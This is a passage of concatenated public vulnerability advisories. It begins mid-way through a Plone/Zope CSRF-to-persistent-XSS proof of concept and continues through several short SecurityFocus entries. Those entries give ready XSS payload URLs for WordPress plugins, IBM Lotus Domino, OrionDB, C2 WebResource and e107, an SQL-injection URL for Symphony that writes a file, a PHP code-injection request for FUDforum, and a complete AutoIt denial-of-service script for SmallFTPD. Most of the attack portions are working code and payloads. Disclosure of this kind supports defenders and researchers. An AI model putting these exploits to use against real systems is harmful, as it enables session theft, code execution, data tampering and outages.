doit(){ var e=document.getElementById('HELL') e.submit() } </script> <form id="HELL" method="post" action=" http://localhost:8080/Plone/Members/portal_factory/Link/link.2015-08-30.6666666666/atct_edit "> <input type="text" name="title" id="title" value="HYP3RLINX" size="30" maxlength="255" placeholder="" /> <input type="text" name="remoteUrl" id="remoteUrl" value=" http://hyp3rlinx.altervista.org" size="30" maxlength="511" placeholder="" /> <input type="hidden" name="fieldset" value="default" /> <input type="hidden" name="form.submitted" value="1" /> </form> 2) CSRF to Persistent XSS - Zope Management Interface ++++++++++++++++++++++++++++++++++++++++++++++++++++++ Persistent XSS via CSRF on title change properties tab, this will execute on each Zope page accessed by users. CSRF to Persistent XSS POC Code: ================================= <form id="HELL" action="http://localhost:8080/" method="post"> <input type="text" name="title:UTF-8:string" size="35" value="</title><script>alert('XSS by hyp3rlinx 08302015')</script>" /> <input name="manage_editProperties:method" value="Save Changes" /> </form> Disclosure Timeline: ========================================================= Vulnerability reported: 2015-08-30 Hotfix released: 2015-10-06 Exploitation Technique: ======================= Remote Vector NETWORK Complexity LOW Authentication NONE Confidentiality NONE Integrity PARTIAL Availability PARTIAL Severity Level: ========================================================= 6.4 – MEDIUM Description: ========================================================== Request Method(s): [+] POST Vulnerable Product: [+] Zope Management Interface & all versions of Plone prior to 5.x are vulnerable. =========================================================== [+] Disclaimer Permission is hereby granted for the redistribution of this advisory, provided that it is not altered except by reformatting it, and that due credit is given. Permission is explicitly given for insertion in vulnerability databases and similar, provided that due credit is given to the author. The author is not responsible for any misuse of the information contained herein and prohibits any malicious use of all security related information or exploits by the author or elsewhere. by hyp3rlinx

source: https://www.securityfocus.com/bid/58671/info The Banners Lite plugin for WordPress is prone to an HTML-injection vulnerability because it fails to properly sanitize user-supplied input. Successful exploits will allow attacker-supplied HTML and script code to run in the context of the affected browser, potentially allowing the attacker to steal cookie-based authentication credentials or to control how the site is rendered to the user. Other attacks are also possible. http://www.example.com/wordpress/wp-content/plugins/wp-banners-lite/wpbanners_show.php?id=1&cid=a_<script>alert(/XSSProof-of-Concept/)</script>

source: https://www.securityfocus.com/bid/58715/info IBM Lotus Domino is prone to multiple cross-site scripting vulnerabilities because it fails to properly sanitize user-supplied input. An attacker may leverage these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may let the attacker steal cookie-based authentication credentials and launch other attacks. IBM Lotus Domino 8.5.4 and prior are vulnerable. http://www.example.com/mail/x.nsf/CalendarFS?OpenFrameSet&Frame=NotesView&Src=data:text/html; base64,PHNjcmlwdD5hbGVydChkb2N1bWVudC5jb29raWUpPC9zY3JpcHQ%2B http://www.example.com/mail/x.nsf/WebInteriorCalendarFS?OpenFrameSet&Frame=NotesView&Src=data:text/html;base64,PHNjcmlwdD5hbGVydChkb2N1bWVudC5jb29raWUpPC9zY3JpcHQ%2B http://www.example.com/mail/x.nsf/ToDoFS?OpenFrameSet?OpenFrameSet&Frame=NotesView&Src=data:text/html;base64,PHNjcmlwdD5hbGVydChkb2N1bWVudC5jb29raWUpPC9zY3JpcHQ%2B http://www.example.com/mail/x.nsf/WebInteriorToDoFS?OpenFrameSet&Frame=NotesView&Src=data:text/html;base64,PHNjcmlwdD5hbGVydChkb2N1bWVudC5jb29raWUpPC9zY3JpcHQ%2B

source: https://www.securityfocus.com/bid/58720/info OrionDB Web Directory is prone to multiple cross-site scripting vulnerabilities because it fails to sanitize user-supplied input. An attacker may leverage these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and launch other attacks. http://www.example.com/wd-demo/index.php?c=<script >prompt(35)</script> http://www.example.com/wd-demo/index.php?c=search&category=Food&searchtext=1</title><h1>3spi0n</h1><script >prompt(35)</script>

source: https://www.securityfocus.com/bid/58771/info Feedweb plugin for WordPress is prone to a cross-site scripting vulnerability because it fails to sufficiently sanitize user-supplied input. An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and to launch other attacks. Feedweb 1.8.8 and prior versions are vulnerable. http://www.example.com/wordpress/wp-content/plugins/feedweb/widget_remove.php?wp_post_id=[XSS]

source: https://www.securityfocus.com/bid/58838/info C2 WebResource is prone to a cross-site scripting vulnerability because it fails to properly sanitize user-supplied input. An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may let the attacker steal cookie-based authentication credentials and launch other attacks. http://www.example.com/fileview.asp?File=<script>alert(document.cookie)</script>

source: https://www.securityfocus.com/bid/58841/info e107 is prone to a cross-site scripting vulnerability because it fails to properly sanitize user-supplied input. An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and to launch other attacks. e107 1.0.2 is vulnerable; other versions may also be affected. http://www.example.com/e107_plugins/content/handlers/content_preset.php? %3c%00script%0d%0a>alert('reflexted%20XSS')</script>

source: https://www.securityfocus.com/bid/58843/info Symphony is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied input before using it in an SQL query. Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database. Symphony 2.3.1 is vulnerable; other versions may also be affected. http://www.example.com/symphony/system/authors/?order=asc&sort=id%20INTO%20OUTFILE%20%27/var/www/file.txt%27%20--%20

source: https://www.securityfocus.com/bid/58856/info SmallFTPD is prone to an unspecified denial-of-service vulnerability. A remote attacker can exploit this issue to crash the application resulting, in denial-of-service conditions. SmallFTPD 1.0.3 is vulnerable; other versions may also be affected. #ce #include <String.au3> $f=_StringRepeat('#',10); $USE_PROTO='ftp://'; $INVALIDIP='INVALID IP FORMAT'; $INVALIDPORT='INVALID PORT NUMBER!'; $HTTPUA='Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; SV1; .NET CLR 1.1.4325)'; $msg_usage=$f & ' smallftpd 1.0.3 DENIAL OF SERVICE exploit ' & StringMid($f,1,7) & @CRLF & _ $f & " Usage: " & _ @ScriptName & ' REMOTEIP ' & ' REMOTEPORT ' & $f & @CRLF & _ StringReplace($f,'#','\') & _StringRepeat(' ',10) & _ 'HACKING IS LIFESTYLE!' & _StringRepeat(' ',10) & StringReplace($f,'#','/') if $CmdLine[0]=0 Then MsgBox(64,"","This is a console Application!" & @CRLF & 'More Info: ' & @ScriptName & ' --help' & @CRLF & _ 'Invoke It from MSDOS!',5) exit; EndIf if $CmdLine[0] <> 2 Then ConsoleWrite(@CRLF & _StringRepeat('#',62) & @CRLF & $msg_usage & @CRLF & _StringRepeat('#',62) & @CRLF); exit; EndIf $ip=StringMid($CmdLine[1],1,15);//255.255.255.255 $port=StringMid($CmdLine[2],1,5);//65535 validateall($ip,$port) func validateall($ip,$port) if not StringIsDigit($port) Or NOT (Number($port)<=65535) Then ConsoleWrite($INVALIDPORT); Exit; EndIf TCPStartup(); $ip=TCPNameToIP($ip); TCPShutdown(); $z=StringSplit($ip,Chr(46));//Asc('.') if @error then ConsoleWrite($INVALIDIP); exit; EndIf for $x=0 to $z[0] if Number($z[0]-1) <>3 Then ConsoleWrite($INVALIDIP); Exit EndIf if $x>=1 AND Not StringIsDigit($z[$x]) Or StringLen($z[$x])>3 Then ConsoleWrite($INVALIDIP); exit; EndIf Next $x=0; ConsoleWrite(@CRLF & _StringRepeat('#',62) & @CRLF & $msg_usage & @CRLF & _StringRepeat('#',62) & @CRLF); ConsoleWrite(@CRLF & $f & _StringRepeat('#',6) & ' WORKING ON IT! PLEASE WAIT...' & _StringRepeat('#',6) & $f & @CRLF) downit($ip,$port,$x) EndFunc; =>validateall($ip,$port) Func downit($ip,$port,$x) $x+=1; TCPStartup() $socket_con = -1 $socket_con = TCPConnect($ip, $port) If not @error Then if Mod($x,40)=0 Then ConsoleWrite(_StringRepeat('-',62) & @CRLF & '~ TRY count: ~ ' & $x & @CRLF & _StringRepeat('-',62) & @CRLF) Sleep(Random(1000,1800,1)); EndIf downit($ip,$port,$x) Else Beep(1000,1500) ConsoleWrite(_StringRepeat('#',62) & @CRLF & $f & _StringRepeat(' ',12) & 'Mission Completed! @' & $x & _StringRepeat(' ',12) & $f & @CRLF & _ _StringRepeat(' ',5) & ' TARGET =>' & StringLower($USE_PROTO & $ip & ':' & $port) & '/ is * DOWN ! * ' & @CRLF & _StringRepeat('#',62)); TCPShutdown(); exit; EndIf EndFunc; ==>downit($ip,$port,$x) #cs

source: https://www.securityfocus.com/bid/58845/info FUDforum is prone to multiple vulnerabilities that attackers can leverage to execute arbitrary PHP code because the application fails to adequately sanitize user-supplied input. Attackers may exploit these issues to execute arbitrary PHP code within the context of the affected application. Successful attacks can compromise the affected application and possibly the underlying computer. FUDforum 3.0.4 is vulnerable; other versions may also be affected. POST /adm/admreplace.php HTTP/1.1 Host: fudforum Referer: http://www.example.com/fudforum/adm/admreplace.php?&SQ=8928823a5edf50cc642792c2fa4d8863 Cookie: fud_session_1361275607=11703687e05757acb08bb3891f5b2f8d Connection: keep-alive Content-Type: application/x-www-form-urlencoded Content-Length: 111 SQ=8928823a5edf50cc642792c2fa4d8863&rpl_replace_opt=0&btn_submit=Add&btn_regex=1&edit=&regex_ str=(.*)&regex_str_opt=e&regex_with=phpinfo()